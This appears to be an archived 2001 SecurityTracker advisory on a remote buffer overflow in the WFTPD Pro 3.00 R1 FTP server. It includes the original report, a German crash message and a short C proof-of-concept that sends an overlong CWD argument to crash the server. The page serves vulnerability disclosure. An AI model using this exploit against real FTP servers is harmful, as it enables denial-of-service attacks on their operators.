SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WFTPD Pro Vendors:   Texas Imperial Software
Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely
SecurityTracker Alert ID:  1000987
SecurityTracker URL:  http://securitytracker.com/id/1000987
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 5 2001
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 3.00 R1, possibly others
Description:   The WFTPD Pro FTP server for Windows NT/2000 contains a vulnerability that allows a remote user to crash the server and possibly execute arbitrary code on the server.

It is reported that sending a command (cwd) followed by a long argument (~500 char '.'), the server will crash. This buffer overflow may be able to be used to execute arbitrary commands on the server.

The author has reportedly been contacted.

A demonstration exploit is contained in the original report.

Impact:   A user can remotely cause the server to crash and may be able to remotely execute arbitrary commands on the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.wftpd.com (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely
This is a follow-up message. The vendor confirms the bug and has assigned a bug ID number to it.



 Source Message Contents

Subject:  WFTPD Pro 3.00 R1 Buffer Overflow


When sending a command (cwd) followed by a long 
argument (~500 char '.')
the server crashes with:


Anwendungspopup: WFTPD Service Control: 
WFTPD.EXE - Fehler in Anwendung: 
Die Anweisung in "0x2e2e2e2e" verweist auf 
Speicher 
in "0x2e2e2e2e". Der Vorgang
werden.

which means in English: Exception fault at: 
0x2e2e2e2e
reading from 0x2e2e2e2e is not possible...


Executing arbitrary code is possible


The author has been contacted

----------------------
se00020@fhs-hagenberg.ac.at or
se00020@lion.cc

Tested on win2k using trail version of WFTPD 3.00 
R1


Simple exploit:

//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by se00020@fhs-hagenberg.ac.at

#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#include <malloc.h>

void main(){
	SOCKET sock_victim;
	WORD version=MAKEWORD(1,1);
	WSADATA wsadata;
	SOCKADDR_IN victim;
	int sockid;
	char buffer[1024];
	char exploitbuffer[800]={"CWD "};
	char recvbuffer[1024];



        WSAStartup(version, &wsadata);
	
	sock_victim=socket(AF_INET, 
SOCK_STREAM, IPPROTO_TCP);
	victim.sin_family=AF_INET;
	victim.sin_addr.s_addr=inet_addr
("10.17.3.44");
	victim.sin_port=htons(21);
	sockid=connect(sock_victim, (sockaddr*) 
&victim, sizeof(victim));
	
    
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
	memset(recvbuffer, '/0',sizeof(recvbuffer));
	send(sock_victim, "USER test\r\n",strlen
("USER test\r\n"),0);
 	recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
	memset(recvbuffer, '/0',sizeof(recvbuffer));
	send(sock_victim, "PASS\r\n",strlen
("PASS\r\n"),0);
	recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
	memset(recvbuffer, '/0',sizeof(recvbuffer));
	

	memset(exploitbuffer+4,'.',sizeof
(exploitbuffer)-4);
	sprintf(buffer,"%s\r\n",exploitbuffer);
	
	send(sock_victim, buffer , sizeof(buffer),0);
	recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);

        closesocket(sockid);
	closesocket(sock_victim);

}

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC